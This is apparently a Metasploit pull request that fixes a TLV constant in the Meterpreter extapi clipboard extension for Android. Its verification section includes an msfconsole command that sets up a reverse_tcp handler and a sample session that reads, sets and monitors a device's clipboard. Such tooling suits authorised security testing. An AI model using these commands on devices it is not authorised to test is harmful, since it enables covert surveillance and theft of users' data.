### PR TITLE
fix clipboard tlv usage (required for android extapi_clipboard)

### DIFF
--- a/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb
@@ -41,7 +41,7 @@ class Clipboard
   def set_text(text)
     request = Packet.create_request('extapi_clipboard_set_data')
 
-    request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT, text)
+    request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT, text)
 
     response = client.send_request(request)
 


### PR DESCRIPTION
Quick change to allow extapi_clipboard on android.
TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT is not a TLV_STRING, whereas  TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT is.
## Verification
- [x] Build https://github.com/rapid7/metasploit-payloads/pull/116 (and it's requirements)
- [x] Get an android meterpreter session e.g:

```
 ./msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost 0.0.0.0; set lport 4444; set ExitOnSession false; run -j"
```
- [x] Run `load extapi` on the meterpreter session
- [x] **Verify** clipboard_get_data returns the devices clipboard data
- [x] **Verify** clipboard_set_data can be used to set data on the devices
- [x] **Verify** clipboard_monitor_start and clipboard_monitor_dump can be used to monitor clipboard changes
## Sample run

```
meterpreter > load extapi
Loading extension extapi...success.
meterpreter > clipboard_set_text lol
meterpreter > clipboard_get_data 
Text captured at 
=================
lol
=================

meterpreter > clipboard_monitor_start 
[+] Clipboard monitor started
meterpreter > clipboard_monitor_dump 
Text captured at Mon Sep 05 17:32:24 GMT+01:00 2016
===================================================
https://m.reddit.com/r/videos
===================================================

[+] Clipboard monitor dumped
meterpreter > 
```
